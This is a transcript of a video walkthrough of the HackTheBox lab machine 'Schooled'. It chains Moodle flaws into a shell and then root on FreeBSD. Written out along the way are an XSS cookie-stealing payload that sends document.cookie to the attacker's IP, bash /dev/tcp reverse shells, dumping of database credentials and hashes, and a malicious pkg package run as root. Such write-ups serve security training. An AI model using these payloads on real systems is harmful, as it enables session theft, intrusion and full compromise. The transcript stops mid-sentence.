What's going on YouTube? This is Ipsec, me doing Schooled from HackTheBox, and I really like this box because it shows the value of chaining together multiple CVEs to get what you want, and in this case, it is a shell on the box. And it does that by installing the open source application Moodle, which is essentially just a web application for online schools, similar to like Blackboard, Canvas, or Google Classroom. I don't know what other ones there are, but that's not really important. The important thing is there's a few CVEs that starts out with a cross-site scripting vulnerability in your profile they can use to steal the cookie of a teacher. And there's another vulnerability that allows teachers to escalate to managers, which is like an administrator. And then there's a third one, once you're a manager, to re-enable the ability to install plugins that you can use to upload and get code execution on the website. Once you're on the box, it is a FreeBSD box. You crack a user's password, SU as them, or you can SSH into the box as that user. And they have the ability to install packages with PKG, which is just like APT, but for BSD. And you can create a malicious package and install it to get code execution as root. With that being said, let's jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it schooled, and then the IP address of 10.10.10.234. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's a FreeBSD box, which I don't have much experience with. However, it is very similar to Linux, so once I get a shell on it, I think I'll feel right at home. And then we have a date here. This is either probably the date OpenSSH was compiled or the date of the kernel. I don't know exactly what it is, but it does say it is 2020 February 14th. So I know the box was at least updated on this day. It may be after it because I don't know how frequently the FreeBSD release cycle is, but if you like updated in May and there wasn't a new kernel, maybe this date doesn't get updated. But what this does tell us is we don't have to look at really old CVEs like Image Tragic or things like that, because chances are they've been updated. If I saw this as like 2016, 2015, I'd be looking at things like Hurt, Bleed, Shell Shock, things like that. But because it's recent, I can just ignore all those old vulnerabilities and move on. We also have HTTP on port 80. It's running Apache HTTPD, and I'm sure we can look at this version with FreeBSD and find out more times when this box was released. I wonder if I can just Google like PHP 7415 FreeBSD. Let's see what happens. I'm actually not sure. FreeBSD, this PHP version, what does this do? Exploiting Moodle. I'm guessing this is a write-up or something, yeah. So we'll ignore that. Let's see, fresh ports, PHP 7 changelog. I don't know if it really tells us too much. 7415, I wonder if we can pull this. So 04 February 2021. So that's when this PHP version was released. So we know the box was updated in 2021 now, whereas before we were thinking it was just 2020. So this leads me to believe it is the SSH version and not kernel version, but if I remember, we'll look at that once we get a shell on it. And generally, boxes retire like 6 to 7 months after they release, and this means the box was probably updated right before it launched. So shouldn't look at any of those old CVEs that would be affected in like a package managed by the package manager. So let's go take a look at the website. So going to 10.10.10.234. And am I not connected? Let's see. It is 10.10.10.234. Come on, Firefox. There we go. I'm not sure exactly what the delay was there. Maybe I had a typo somewhere and copy and paste saved it for me. But we have Schooled, the Educational Institute. And we're just looking around this. We are Schooled, an online institution. If we go click Learn More, we can look at the bottom left. That's just going nowhere because it's got that little pound sign after the link. So we don't really have anything here. Looks like we go back to 2004. This is a weird way to do a timeline. Like the order is on the right. I've never seen a timeline like that. I'm surprised 2002 is not here. Let's see. Testimonials. Don't have too much. We do have an email address as admissions@schooled.htb, and because we have school.htb, we should probably put that in our host file so we can access it over DNS. So let's go back to our terminal and do sudo v etc host, and we can say 10.10.10.234 is school.htb. Save that, and then we can take a look at the page to see if it brings us anywhere else. It doesn't look like it does. So while we're looking at this, we can set up a quick GoBuster. So GoBuster directory mode -u for URL, http, school.htb. We could have done the IP address since they're the same sites. It doesn't matter. -w for word list. We'll do opt, seclist, and then discovery web content, then raft small words.text, and we should check if this is PHP. So I'm just going to do like index.php. We don't get anything. Let's try index.html. We get a page, so this is most likely going to be a static site. If we go to about, we also got about.html, so I can do -x for extension, HTML. And that should be good. We probably want to do -o for out file. We'll just call this GoBuster.out and let that run to see if there's anything interesting. Going to teachers, we have names. So if we can find like an email address, we can figure out how they do emails, or like the username convention, because this is admissions@school.htb. So it may be like L Carter for the username. It could be Leanne_Carter. It could just be Carter. It could just be Leanne. We don't know how their usernames work. So that is kind of what I'm looking for on this website to see if we can get any other emails. The contact page is a good place to go, and it just brings us up here. So we don't really have too much. Page didn't load Google Maps correctly. So no real emails. We do have a copyright of 2020. So we know that's not dynamically updated, and it's not a big surprise because this is HTML, nothing else. We could take a look at the source code to see if it was built with anything. But again, I'm not really too interested because this is a HTML site, not PHP, Python, whatever. So I'm going to go on and we'll look at GoBuster. We don't really see too much. So let's check virtual host out. So let's do GoBuster, I think it's vhost. Yep. URL and word list. So we'll do -u, http, school.htb, and the word list will do opt, seclist, discovery, DNS, subdomains. We'll try top 5,000 first and see if this gets us anything. And we have moodle.school.htb. So this is definitely something. Moodle is a open source application to like build courses, things like that for students. So let's go sudo vi etc host and add moodle.school.htb in there, and we can take a look at this page. And it looks like a Moodle instance. We can see by this banner here. And the first thing we want to do is try to find a way to enumerate this version. So I'm going to go to the GitHub page because I know this is open source, and we can take a look at things on this page. So if we go here, we're looking for a way to identify the version. And I always look at like the months ago because I want something relatively recent. Like if it's updated 6 years ago, I can ignore this file because it's not changing that often. Ideally, I want something that gets changed very frequently because that is indication that something is changing. Like this README, it's 6 years ago, so it's not going to have a version information. Same with like install.txt. Since it's not being changed, it's of no interest to us. We could check if it exists. So if we go to /install.txt, install.txt, not found. Maybe we have to go into /Moodle, which will tell us potentially where everything is installed. So Moodle install.txt exists, which confirms we can access these files, but nothing too interesting. We have version.php and security.txt. So these two are good. Let's try security.txt. See what this is. Not found. Let's try version.php. We don't get anything back because we probably have to be logged in to view this page. If I look at the source code to this, it may be quick to tell. Defined Moodle internal or die. So whatever this field is, it's not defined, so we're dying immediately. I'm guessing Like this will be defined if we're coming from an admin page or something like that. So I don't see anything jumping out at me right off the bat. The next thing I like looking at is themes, because generally this is where like a lot of JavaScript files go, so we won't have that issue with PHP where it just displays nothing because it's trying to execute code. JavaScript's generally static, and there's a lot of dependencies, let's say like jQuery. A lot of libraries don't update jQuery that frequently, but if it does, you can generally get an idea of the version of something. So like if this was keeping up to date with the latest version of jQuery, which is just a JavaScript library a lot of web applications use, we can see how frequently it commits. Like on this, we got a 5-day ago. We look at the releases. We have one in March, one in May. So again, you can get an idea of when this web application was released based upon looking at the JavaScript. We also have upgrade.txt. It is 8 months ago, but if I click it, we can see it looks like it has major versions. So I'm going to try this. So it is /theme upgrade.txt. And we can see it is saying 3.9. And if we look at this, it goes all the way up to 3.11. So we know we're running Moodle version 3.9. The other really nice thing about like searching versions or using, I don't know what I was going to say. The other thing we can do is look at security announcements. A lot of applications do have security announcements. If they don't, then you can look at like CVE databases. But if we look at security announcements, it lists all the known like major security vulnerabilities to us and tells us if it's like minor, a major vulnerability, things like that. The thing we don't know now is which to look at, because we could just keep clicking the pages and look at versions fixed and get an idea of what's there. But the better way to go about this is look at when Moodle 3.9 was released and then work our way back. Let's see, Moodle 3.9 looks like it was June of 2020. If we look at release notes, we can also confirm that day. Release notes are on July 14th, but the release date is June 15th. So I'm guessing the page was just updated July 14th or something. Not sure exactly what. But here we just want to go to something that is around June of 2014. So let's go here. Let's see, we're in January 2021 still. September 2020. And if we go to the next page, that is March of 2020. So it's somewhere on this page most likely. And let's see, that's March, May, July 2020. So we know from this day on, Moodle is like anything may be applicable to us, because somewhere between this May 18th and July 20th is when it was patched. We can see this very first thing is a jQuery version. It is only marked as minor. So if we looked at like when jQuery was released, we'd probably be able to flag around the time this was updated, because they updated jQuery in response to this vulnerability. So even if upgrade.txt wasn't there, we'd still find a way to enumerate this application. Looking here, we have reflective XSS and admin log filter. We have course enrollment allows privilege escalation from teacher role into manager role. Denial of service. Stored XSS via MoodleNet profile parameter. Another XSS. So there's a lot of cross-site scripting vulnerabilities. Let's go all the way to the bottom and keep going up. Login as in course context may lead to privilege escalation, denial of service, chapter name. So we have a lot of vulnerabilities. I don't see anything like unauthenticated. We can look at like searchpoint as well to see if there's any like unauthenticated CVEs, but I don't really see anything there. There's this RCE, but it's 341, so I'm just ignoring that. So let's go take a look back at the website. Let's go to moodle.school.htb. And we are not logged in. We can potentially try to see if we can enumerate usernames to get how they do it. So if I do Leanne, because the name was Leanne Carter, it says if you supply the correct username and email, it will email you. So it's not telling us valid username, so we can ignore that. Let's try it on the email address, lcarter@schooled. privesc.htb to see if anything there. Again, it's the same message if we had a valid username or email or not. So we can't validate potential usernames. And since I can't validate a username yet, that's why I'm not going to go down this like password spraying, brute forcing type thing. But let's try creating an account. So we can create the account, ipsec, the password of password1, email address, let's do root@ipsec.rocks, copy it, do it again, ipsec, we don't have to do city, state, anything, create an account. And email is not allowed. We need an email with student.school.htb. So let's do this and just use that domain for this email and see if it works. My first intuition is this won't work because we don't have any way to retrieve this mail to click something that verify we own the email. But if they don't have email verification on, then it'll work. So click the link below to confirm our account. Okay, and looks like we're logged in, so they don't have any type of confirmation. Looking at the CVEs, we knew there was a CVE if we can get, or a privilege escalation if we can get to the teacher role, but chances are just signing up doesn't give us that teacher role. So there's not much we can do in terms of the CVE right now. Going to the dashboard, I don't see anything. Let's go back to the home page. Where is course enrollments? Site home. So we got 4 courses. Let's check out these, if this gives us any different information now that we're logged in. We can enroll. We can't enroll in scientific research, IT, or English. But we can enroll in this math one. So I'm going to enroll in math. And let's take a look at anything here. The teacher is Leanne Carter. Wait. Well, I'm in English now. What just happened? That was weird. I thought I was enrolling in math, and suddenly I went to English. But back here, we're now in the mathematics course. If I look at announcements, we can see Phillips has 2 announcements, or 1 announcement from Phillips and 1 from Jamie. Reminder for joining students. This is a self-enrollment course for students who wish to attend my lectures. Make sure you have your Moodle net profile set. Students who do not will be removed from the course before they start, and he will be checking all students who enrolled in this course. So generally whenever I see someone will be checking something, especially in a CTF, I know there's going to be some type of like automated thing to do interaction. In this case, I'm guessing it's going to be a cross-site scripting vulnerability, because if we look at the Moodle thing, we had a stored XSS via Moodle net profile parameter. And what this is saying is Moodle net profile set. So I'm going to try to edit my profile and see if I can put some type of cross-site scripting. Go to my profile, edit profile, and here is Moodle net profile. The first thing I want to do though is just test something real quick. I'm just going to put cross-site scripting everywhere. Description, sure, additional names. I probably should be putting a unique thing here, but like unique per field, but I'm not. And let's see if they have input validation here, because this could be a big pain if they do. Doesn't look like they do. And now I'm just looking for wherever there's bold. So we can see this Moodle net profile does have bold here. So since it's processing HTML, we can try cross-site scripting. So if you're trying to look for a O-day in this and do it on your own, this is generally how I'd go about it. Just putting cross-site scripting in a bunch of things, and when you get one, then you know. So we can edit our profile again and put our JavaScript thing here. And additionally, you could just do what we're about to do and have JavaScript call back to you, and that will help you if there's like a blind thing. So there's a chance that like it's doing input validation, or I guess output validating on all this JavaScript when we view the profile, but maybe in the admin panel, it's not doing output validation somewhere, and we'll get triggered cross-site scripting. We have no way to identify that because the cross-site scripting payload we're using is completely visual to us. But if we did something like script source is equal to http 10.10.14.8 slash, we'll call it please subscribe.js, and then slash script. Then if it gets triggered elsewhere, we'll still know because of the callback, as long as we're monitoring that. And that's how tools like XSS Hunter work and why they can be useful. Because you just stand up the server, put all that payload everywhere, and then when you get a callback, it kind of tells you the page it was on. So let's do nclvnp 80, just to set up a listener to validate that cross-site scripting works. Update profile. And we're hanging right now because we have a connection. And then we close that and the page comes back. So we know we have a way to get code execution. So what I'm going to do is make dir, well, not code execution, but cross-site scripting. Go into www. I'm going to sudo python 3 http.server on port 80. We forgot the -m. There we go. And then we called it what? Please subscribe.php, or not PHP, JS, right? I called it JS. Yes, I did. So we just have to write JavaScript to do something. My first thought is just to steal the cookie. So I'm going to do document.write, and then we can do, let's do an image. Image source is equal to, I'm going to put this in single quotes, http 10.10.14.8 slash question mark, and then document.cookie plus, and we want to close this. That's a single quote there. So what I'm doing is I'm putting, this is one thing, and we're terminating the single quote so I can put a variable, which is going to be a cookie. And then let's start the single quote again. We can kill that. And I can't remember if I need a slash for the image. I don't think I do. So let's just do that and see what happens. So we did have the box reach back to us while we were writing that script, and we did not save it yet, so we missed that hit. So let's just refresh the page to make sure everything works. I got this, and not found. So there's a typo somewhere, or not a typo, but I did not put it in the right directory. Sent. So this is me, 10.10.14.8. We got please subscribe, and then the JavaScript sends our Moodle cookie. So everything looks like it's going to work. I'm just going to pause the video and wait for the automation to come to get the cookie of the user. So we have the Moodle session coming back, and this time we can see it's 10.10.10.234. So what I'm going to do is put this cookie in my browser and see if it works. So I'm going to press F12, then we can go to storage, cookies, Moodle session, and let's change out that cookie to be the other user and refresh the page, and we can see I am now manual Philip. And manual Philip is going to be a teacher role. I'm trying to find out a way to validate that. If I go to, let's see, blog form, not exactly sure where it would say that. We can definitely see where Manuel Phillips, and if we looked at the courses, he is the owner of this mathematics course. So let's go back to the Moodle security announcements and find that one vulnerability. So this MSA 20.0009 course enrollment allows privilege escalation from teacher role into manager role, and teachers of courses were able to assign themselves the manager role when within that course. We have the CVE here, and when searching for public exploits, the CVE is generally what you want. You also have the reporter name. So we can first just search this on Google and see what happens. The reporter's name is right up front. I was going to say if we don't have anything, then we could put his name in there as well to find it, or put the CVE in GitHub. Looks like there's some automated scripts to exploit it, but I don't want to do the automated script. I like stepping through it for these videos, so that's what we'll do. He's showing that you can use Docker to just pull the exact Moodle version and then test it that way. He does provide a actual Python script, but also a blog and video. I wonder what the blog says. When I did it, did I just get like popped? Well, that was weird. uBlock origins block something. Well, I don't know what's going on there. Let's not go to that link. That probably revert this VM when I'm done this video. That definitely a little concerning, but yeah. So sometimes when you click links, weird things happen, and when weird things happen, it's pretty bad. We can look at the video proof of concept, and this is essentially how I did it. I'm not going to watch this whole thing because we can explain it. So the first thing we have to do is get the manager of Moodle. And the easiest way to do that is on this schooled page. Or we could do it kind of like through trial and error or just clicking around Moodle. But Leanne Carter is the manager. She's the only one that has this. So if we go back here, let's see. Let's close some of our unused tabs. There we go. So let's go courses. We need to find a way to enroll a user. So let's see, site home, my courses, that's where I'm at. Participants, enroll users, and it bothers me. I think this is spelled correctly, it's just a different like dialect or something. I always thought enroll had 2 L's, but I digress. So we want to select Leanne Carter because she is the manager. And then the assign role doesn't matter too much. And we also have to get our user ID. So that is the next piece of this. So before I do anything, I'm going to try to find ours. And generally, like on a profile page or something is where you can find your user ID. So let's go to profile. My ID is 24. So let's turn Burp Suite on. Where is this? Burp. Do this. Proxy intercept on. Enroll user. And we can see the action enroll. Enroll ID. One of the easy ways to edit things is through this inspector tool of Burp Suite now. We don't have to go read all this. We can just see. This user list, we have to change this from 25, which is the user ID of Leanne Carter, to 24, which is the user ID of us. And then we also want to change the role to assign to be 1. Generally, the most like admin role is going to be 1. 5 is probably the teacher role. So these are just identifiers of what role it is. And if you don't know this, you could have to look through like the Moodle source or look through the CVE, things like that. So we change the user list to our ID and the role to assign to 1. I'm going to put this in the repeater tab and send it. And we have success true. So now if I go to the dashboard, we disabled Burp Suite. Let's go back. See, is Leanne Carter enrolled? Where are you? Leanne. She should be in here. Travis Wright. Role student. Manuel Phillips. Manager teacher. I wonder if I have to, let's see, 25? I think I have to enroll Leanne Carter as well into this course. So I'm going to enroll users, and we'll just do Leanne, and this time we won't edit anything. And now when I click on her page, I can do login as. And this wasn't here if we did not do this one step. This one step was some weird like mass assignment, well not mass assignment, probably an IDOR vulnerability into being able to assign the permission to do what I just did. So now we are logged in as Leanne Carter. And Leanne Carter is a manager. So if I go to Site Administration, Plugins, we can see we can't install plugins because it is disabled. But if we, let's see, where is it? There's something here where we can go and enable it. Let's see, Site Administration, block edits on. Where are you? I think it's under users. Yeah, define roles. And then let's see. Allow role assignments. If we save the change here, this is going to be, I think, a mass assignment vulnerability, or maybe it's role override. Manager already checked everywhere. I think this is actually a mass assignment vulnerability. And that's when you're able to make changes to things that the web UI just doesn't like give you the ability to, but if you put it there, you could do it anyways. So to kind of explain that, let's save changes. And I sent this to Burp Suite, so we can look at this. Where is it? Moodle, come on. Let's turn Burp Suite off real quick. Manage roles. Manager. Okay, this one's it. So we got all these things here, and maybe it's on the page, but where is save? Edit, reset. So if we edit this, we could try clicking allow on all, but the blog post is going to give us something that is super handy. And then we'll go over it. So we have all these fields here. I'm going to send this over to Repeater. And what the blog post wants us to do, if we still had that up, let's turn Burp Suite off. Go to the GitHub page. Blog post wanted us to copy this. So we just copy this whole thing. And then after we do this, we're going to look at kind of what's changed to kind of explain the mass assignment. I think that'll probably be the easiest thing. We leave the session ID and paste everything else. Come on, get to the bottom. I wonder if it'd be faster if I just do page down, paste. And I put that in a new tab. See, manage reset type. We send this. See other. So now let's go back here and go to the plugins to see if we can install a plugin. Site administration, plugins, and now we have this install plugin. And almost anything that lets you install a plugin means you can just get code execution, because you can just create a malicious plugin. But before we do that, let's take a look at exactly what we just did, because this was unclear. I guess I could have used the drag bar earlier. So I'm going to v1.text, and this is going to be edited one. And then I'm also going to v2.text, and this will be unedited. We can just grab it from here. This will probably be the safer bet. So copy, save, and right now this probably looks like an unmanageable mess, right? Like, how do we find out what's different here? Well, we could save both of these and like do a diff on the files, but it's not going to really be too helpful. So I'm going to press the tmux magic key, which is Control B for me, and then colon, and we can do set w synchronize panes. That's synchronize dash panes. So now anything I do in one pane, it happens on the other one. And I'm going to just hit colon S, and we're going to look for the ampersand. and we're going to replace it with \r, which is a return. And now we have this. And we can also probably want to sort, just to sort everything. So I did :sort, and now we have everything here. We go to the very bottom, and we can see the one on the right has 1,242 lines. The one on the left only has 729. So we know there is a difference between the two. And we can see, let's see, allow assign 1, 2, 3, 4, 5. The one on the left, this is the exploit, is going all the way to 8. So I'm going to disable the set W. Actually, do it in tmux, set W, synchronize panes. So we can add things. So we had 5, 6, 7, 8. 6, 7, 8. Just so these are starting to line up. And I can see the bottom line here is archetype equals manager, and it's not that for the exploit. So we can see it is just adding a lot of variables. This allow override 1, 2, 3, 4, 5, 6, 7, 8. That is good. This allow switch. This is going 6, 7, 8. So that's what it looks like. And we can go here. We have 1, 2, 3, 4, 5, 6. And this is ending at 5. So we're missing 2 lines somewhere. So let's see. Line 18 is that. 27 is this allow switch. Oh, we're missing 1, 2, 3. Or 1, 2. So if I do 2 lines, there we go. So this is called mass assignment because the web interface isn't giving us the ability to do a lot of the variables. However, on the server end, it's just looping through all these parameters, and we'll just assign them into the database even if you're not supposed to be able to. The website doesn't have the logic to assign these things, but the server end, because it's dynamic, it does have the logic. So if you sent that to that anyways, it would assign it. Another common place where you normally see this vulnerability is like the registration forms, where you just register an account and then it's passing variables in. And essentially what the web application is doing is it's looping through every variable you did and putting it into the registration database. And it's saying, you know what, if the group doesn't exist, I'm going to assign it the default group, which would be student. But if you just sent the parameter group equals admin, there's a chance the web application just sees that and goes, oh, this isn't taking the default group, and assigns it to the admin role that you specified. So mass assignment, in my understanding, is generally when you send it a parameter it's not expecting, but will work with anyways. So with all that being said, let's just go back to this and see if this still works. It looks like it's still enabled, and we have to install a malicious plugin. In this, it looks like he is installing something called block RCE. Let's see, he's downloading it here. So this is the malicious plugin. So we can just download this. So let's close these panes because we don't need them. And we can do git clone, paste this, Moodle RCE. Oh, we don't want to unzip it actually. Let's see, we can just do it and then domain blocks RCE. Okay. So install plugin. Oh, no, not Moodle directory. Zip. And where do we upload our own? Upload a file. Browse. And then we want to HTTP scold. And Moodle RCE, rce.zip. Wonder if I have to specify any of that. Doesn't look like I do. Install plugin from zip. Validation, install can continue. So we continue. And let's see if we can get code execution. So domain/blocks RCE. So domain, let's just try it here. So we're doing moodle.school.htp/Moodle. CMD is equal to ID. Boom, we have it. So I'm going to set my burp suite back on. refresh this page. And what I want to do is change the request method to see if it accepts post, and it doesn't. So the annoying thing with this plugin is it's only on a get parameter, which that is fine. But we just know we have to work with it like this. So I'm going to do, let's see if this reverse shell works. It may not work because it's BSD. So bash-i, then dev tcp 10.10.14.8, 9001, 0, and 1. And then we want to URL encode this. nc lvnp 9001, send. Ooh, it does work. So we can do python 3-c, import pty, pty.spawn, bin bash. Python 3 command not found. Let's do which python, which script. We do have script. Shoot, how do I do it with script? I think script -q. And then, is it bash dev null? Can't assign that. Let's do script -q dev null. Like that. I know there's a way to get a proper PTY with this script binary. Let's see. Script file command. So I thought it was script -q dev null bash. I wonder if BSD is not letting me do that. Let's do script -q dev null bash. So it's working on my box, but not working here. The other thing, Python may just not be in the path. So I'm going to do find /to dev null to hide errors, and we can grep for Python. And we can see Python 3.7 does exist. So it is somewhere. I may want to grep for like ends in Python, or we can try like user local bin. Let's echo path. We only have sbin, user sbin, and user bin. We don't have user local bin. So user local bin, that is a directory. And we can grep for Python, and it is in here. So I'm going to put the user local bin as part of my path. So I'm going to do export path. Is it? Do I have to export or just do path? Path equals path user local bin. Echo path. Oh, that was not good. Oh, because I didn't put this in capital. Do I still have this? Yeah. So let's do this so we still have our path. So path is equal to this user local bin. Then which Python 3. Now Python 3 exists. So we can do Python 3-c import pty, pty.spawn, bin bash, and now watch the pty.spawn, or pty library is not going to be here, right? Cannot get access to parent directories. Python 3-c import pty, pty.spawn, bin bash. There we go. I wonder if the script would have worked if I just wasn't in that directory. Something weird is going on, but oh well. stty raw minus echo, and then hit fg, enter, enter. And now we have tab autocomplete. So what we want to do is probably cat etc passwd. And we can see there is a few users in this box. What I'm going to do is the same exact thing, but grep-v, no login. And we can see the users. We have root tor, su tor, su-tor. So it looks like we can't su Jamie. Okay, we can. We just can't get into that user. Oh, because he probably doesn't have a login shell or something. But we have Jamie and Steve that we could potentially escalate to. So the thing I want to do is get Jamie's or Steve's password. And if we go back to Moodle.htb, we can see, I think one of them is a teacher. It's school.htb, my bad. Teachers, Jamie. There is no Steve here, so I don't know exactly who Steve is, but Jamie is probably going to be, or Jamie Borham is probably going to be this Jamie user. So that's the user I specifically want to target. BSD's web directory is not going to be var.www.html. It's going to be in this directory. So I'm going to go here and look for Moodle's configuration file. So let's do cd like this. And then, where is Moodle's config? Find .grep config. Admin auth. So when I don't know where the database password is in an application, generally I just do a Google on update database password Moodle. And look at how I change it. So let's see, PHP myadmin, MySQL database. MySQL password change. I need to change it somewhere in Moodle. So Moodle installation /config.php. Cat config.php. Oh, it was there. Okay. So, yeah. But generally that's how I find the files. So we have MySQL native localhost. Here we go. Database password. So MySQL-u Moodle. I'm going to do -d to specify the database of Moodle as well. I think it's -D. And then we need to tell it we want to use a password, so -p. And then paste the password of playbook master, was it 2020? Yeah. So we can do show tables, and we have a lot. I'm going to look at the user table. So I'm just highlighting everything with users. And let's see. User daily, portfolio, chat users. There's a lot of tables in Moodle. Oh, God. Maybe chat users? It doesn't sound like it. Let's see. User daily. Oh, MDL_user. So let's do describe MDL_user. And the reason why I'm doing describe first, because if I just do select *MDL_user, select star from MDL_user, that's a lot of stuff. We can see all our XSS test. And we can look, a lot of these don't even store the HTML tags. So if I was looking for like an ODE, I'd look for the logic that's removing these HTML tags and seeing if I can encode it in a different way to trick the thing that is removing it. Because if it gets in the database, chances are it'll work. So let's do describe. Then we want to look for fields that are of interest to us. Probably username, password, and first name, and potentially email. So username, password, first name, email. So select username, password, first name, email from MDL users. Or is it user? Yeah. And the reason why I wanted these fields is in case the username is an indication of Jamie. First name would definitely be Jamie, and email is just good to know. If we want it to format properly, though, I probably should take that email off. We can probably just do first name and password. There we go. So we know there's two users on the box. It was what? Steve? Let's see. If I do exclamation point, I think it will execute the bash command. etc passwd grep-v no login. Maybe that's not how you do it. But we know we wanted... Shoot. We know we wanted Jamie. And this is actually a pretty decent hashing algorithm. So I'm not going to try to crack all these. because it's hashed, if I put all these in, then Hashcat would have to attempt each one each time, or John, or whatever hashing program you use. So I just want to do this one so it goes as quick as possible. We're doing Jamie because Jamie has an account on the box. So I'm going to do vhash.text, and I think my Kraken is busy right now, so I can't switch to that. I'm just going to use John. So john-w user share word list rocku.text. I think it's -- word list equals. I think that's how you do it in John. Hash.text, we'll see. Bcrypt. So I'm going to let this wait to see if it cracks. We have the password cracked, so we can just grab this and go back to a reverse shell and do su-jamie, paste in the password, and we are now as Jamie. We can try SSHing. So let's try SSH Jamie at 10.10.10.234. Yes. Put the password in, and we can SSH in. I always prefer SSH connections because it's just more stable than the reverse shell and better for like persistence. So I'm going to be working off of this. If I do sudo-l, we can run sudo. And I thought BSD normally used do as, but maybe that's OpenBSD and FreeBSD uses sudo. I'm not exactly sure the difference between do as and sudo in BSD language. But we can see we can run package update and package install. So I'm going to go to gtfobins, and is it gtfo? Maybe it's .com. I'm just going to Google it real quick, like this. pkg, and we can do pkg with sudo. And it looks like make dir, we got fpm, and fpm is something we used before, I believe. If I go to ipsec.rocks, fpm, we used it in Armageddon to install and build packages. So I'm going to do that again. Package install -y no repo update, and then we can specify this. Is that going to work in this? Package install. I believe it is. So let's create this package. So do I still have fpm? cd/opt fpm. Let's see. GitHub fpm package create. And if we don't do this, we'll just create the package manually. So there's this. fpm is to make it quick and build packages. Okay, how do I build this? This is, Ruby, I think. Is it? I just saw Rube right there. Spec. I'm guessing it is. Is there a bin? fpm. Let's just clone this, or go to releases 131. Just source code. I really forget how to use this. I may have to pause the video and watch that video. Pause this video to watch another video. Let's see. Rake build, is that it? I wonder if that's not like I read this as a package error, like it didn't have a library to run, but maybe it's just a normal error of not giving it all the correct parameters. So let's try this. Just copy these, paste. Okay, it does work. Make dir temp -d echo tf. So that's just a random directory name, and it's echoing something to a file and then executing said file. So we probably want to echo, and let's see, /temp shell.sh to tfx.sh. And we can probably just copy this. See, it already exists. So let's go to /temp and delete everything we did. rm-rf temp.stir. So tf is equal to that make. We're executing temp shell and creating. File already exists. Let's see, what file did it create? It was like a x1, that's it. That's the file it's complaining about. So now we created this package. Let's host it, HTTP server. Go back to our shell. wget 10.10.14.8 slash, what was it, x 1.0, port 8000, paste it. curl -o x-1.0.txz. Okay. And I'm going to v temp shell.sh, and I'm just going to echo test to temp pwned. And we probably should bin csh. I'm doing CSH because that is the shell in FreeBSD. If I look, it's not bin bash or bin sh, it's bin csh. So that's why I'm using that. Do I have bash? Which? Bash? Bin bash. It does have bash. So I'm going to change it out to be bin bash. chmod +x temp shell.sh. And we can go back to the gtfobin to try to execute it. See, new package to be installed is not specified in the manifest. Do lsla on temp. And we do have a pwned owned by root. So if I do temp shell.sh, let's try a reverse shell. So bash-i dev tcp 10.10.14.8 9001 0 and 1. That should be fine. What if we have to create a new package? Looks like we don't, and we are root. And funnily enough, this is a new gtfobin, I believe, and that's not really the intended way. The intended way involves creating this package, but actually using the update feature as well. So I'm control seeing here, and it's actually control seeing to my root shell. But we skipped one step of the intended way doing it that. I honestly didn't know that would work when I was doing this. But we're supposed to create a package like we just did. And then we are supposed to find out that we're part of the wheel group, and the lsla etc host is modifiable by wheel. So we can edit the etc host and then point the devops.htb, which if we look at cat etc package FreeBSD, this is where the repository is. So we can edit this to be us 14.8, and then we run a package update, Python 3, HTTP server 80 with sudo, already in use because we used it for our XSS. So right here, if we run package update, sudo, it makes a git to us. So we're supposed to create this whole package repository. So to do that, we can go to Google and say, what is it? pkg create package. See, creating packages. I don't know if that's the post I want. FreeBSD without installing. Creating custom packages. This can be a good one on us. Yeah. So it makes a request to meta.conf, meta.txz, and packagesite.txz. So we have to create each of those files. I think there may be a package repo command to create something. I haven't actually done it, so this will be a test. I'm going to move the malicious package we created into temp. And then we're going to do pkg repo period. And yep, it created all those files for us. So we just got to get these files back to us. So let's go into www, and we can scp, let's see, 1010, 10234, temp/stir into this directory. And then we need Jamie. We also need the password. Do I have John still here? I do. So we can just grab this password, paste, scp each file, Python 3, and then pkg update, sudo pkg update. We may have to edit the host file again because it does revert. So let's change this back to 127.0.0.1. Not 127.0.0.1, my IP, 10.10.14.8. 10.10.14.8. We update. It wants it in packages. So make dir packages. Package update. And then do 10.10.14.8. This reverts pretty quickly. So we updated the packages, and we may be able to do sudo package install x. And that does not look like it worked. Wrong architecture. So it's marked as Linux instead of BSD. And that's probably because we had created this x1.0 txz on Linux. Is it x? Let's see. xjvf. I don't think this is the right syntax. No, let's see. Tar extract xz. Let's try this. Just xf. Yep. So let's see. Compact manifest. CV. Not there. Meta.conf. Package site txz. No. Let's see. Make dir temp. MV. Is it in this? vx.sh. This is just executing our shell. Let's just try this real quick. We probably have to v etc host 10.10.14.8, it's there. Package update. This is pretty annoying to do it this way. gtfobins makes everything easy. Sudo package update, sudo package install. I wonder if I do, does it still say Linux? Wrong ABI. grep-ri, Linux. So it's probably this manifest thing. It's specifying Linux 5, whatever. And that's probably from the FPM. So GitHub, FPM, BSD. Build packages. How do we change this? So like a man page, documentation. See, understanding the basics. There's got to be a way to be able to change the architecture. I'm actually just going to move away from FPM and just edit what it created. I probably can just untar this, edit it by hand, and then create it. So that's what I'm going to try. Make dir, please work, mvx into this directory. Oh god. mv please into please work x.1.0.txt tar-xf, this file. And the reason why I moved into this directory is because it does create things, so I just wanted to see everything it unzipped and not clobber the directory I was in. I'm going to erase this txz, and then we want to edit this manifest. So manifest like that. How do I edit this file? Single quotes. I feel like this is an over-the-wire challenge now. Let's see. If I v star manifest like that. Oh god. Is it going to make me use nano? Is nano going to handle this? Oh god. This may be like the only time you'll see me being like, how do I do this in Vim? And then switch to nano. It's a little embarrassing, but hey, it works. So we want to change this architecture from Linux to FreeBSD. So FreeBSD 13 AMD 64. Control X to save this. Let's go compact manifest. Do the same thing here. So FreeBSD 13 AMD 64. I'm not sure what that 13 means. Maybe it's FreeBSD version. No. File name to write, compact manifest. There we go. So we want to tar this. So tar, let's see, tar create xz. Create tar xz in one command. So capital J is xz. So -c jf x-1.0.txz and then star. Right? So now we have this package again. So Python 3-m HTTP server. We probably just move this. So let's move it up to directories and move packages to packages.old. Make dir packages. And we want to recreate this. So make dir package curl 10.10.14.8 / x 1.0.txz -o x 1.0.txz. That's saved. That was pkg repo period. Okay. So we want to go in packages and then scp everything again. Copy Jamie's password. Sudo vi etc host. It's not a sudo here, just etc host. Change this to 10.10.14.8. And then sudo package update. Sudo package install x. What? Package update. Why is it still Linux 5? I'm guessing my repo command did that? What? Let's see. FreeBSD contains package with wrong. Well, that's annoying. I wonder if I just downloaded the wrong tar? tar xf. Remove that. Let's see. That's FreeBSD. That's FreeBSD. It's telling me the architecture is Linux. Which Linux isn't anywhere in this. tar. Yeah, the manifest is BSD. And the compact manifest is 